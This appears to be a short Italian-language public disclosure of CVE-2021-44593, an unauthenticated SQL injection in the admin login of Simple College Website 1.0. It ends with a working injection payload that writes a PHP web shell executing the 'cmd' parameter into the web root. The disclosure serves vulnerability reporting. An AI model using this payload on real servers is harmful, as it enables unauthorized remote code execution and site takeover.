
Divulgazione pubblica e writeup di CVE-2021-44593, una SQL injection non autenticata in Simple College Website che porta a caricamento arbitrario di file ed esecuzione remota di codice.
Divulgazione pubblica di CVE-2021-44593. Una vulnerabilità di SQL injection/caricamento arbitrario di file/esecuzione di codice remoto in Simple College Website.
Simple College Website 1.0 è vulnerabile a una SQL injection non autenticata basata su UNION nel parametro "username" della pagina /admin/login.php, che può poi essere sfruttata per caricare file arbitrari e ottenere l'esecuzione di codice remoto.
La funzione login() in admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -